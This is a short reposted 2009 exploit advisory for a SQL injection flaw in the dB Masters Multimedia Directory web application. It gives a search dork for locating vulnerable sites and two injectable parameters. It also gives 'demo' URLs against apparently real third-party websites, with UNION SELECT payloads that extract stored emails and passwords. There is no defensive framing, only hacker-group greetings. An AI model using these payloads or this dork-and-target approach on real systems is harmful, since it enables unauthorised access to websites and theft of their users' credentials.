dB Masters Multimedia Directory

===============================================
[0] dB Masters Multimedia Directory SQL Injection Vulnerability

Software : dB Masters Multimedia Directory Link
Vendor : http://www.dbmasters.net/
Author : Angela Chang
Contact : [email protected]
Date : 5 August 2009
===============================================


[o] Dork

"Powered by dB Masters Multimedia Directory"


[o] Exploit

http://localhost/[path]/index.php?ax=deadlink&id=[SQL]
http://localhost/[path]/index.php?ax=list&cat_id=[SQL]



[o] Demo Site

http://webmitter.com/link18/index.php?ax=deadlink&id=-2 UNION SELECT 0,concat_ws(0x7c,id,url,email,password),2 from links--
http://www.judykerr.com/links/index.php?ax=list&cat_id=-8 UNION SELECT 0,1,2,concat_ws(0x7c,id,url,email,password),4 from links--


====================================================
[o] Greetz : -:- SkyCreW -:-

Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf , home_edition2001

====================================================

0 komentar:

Posting Komentar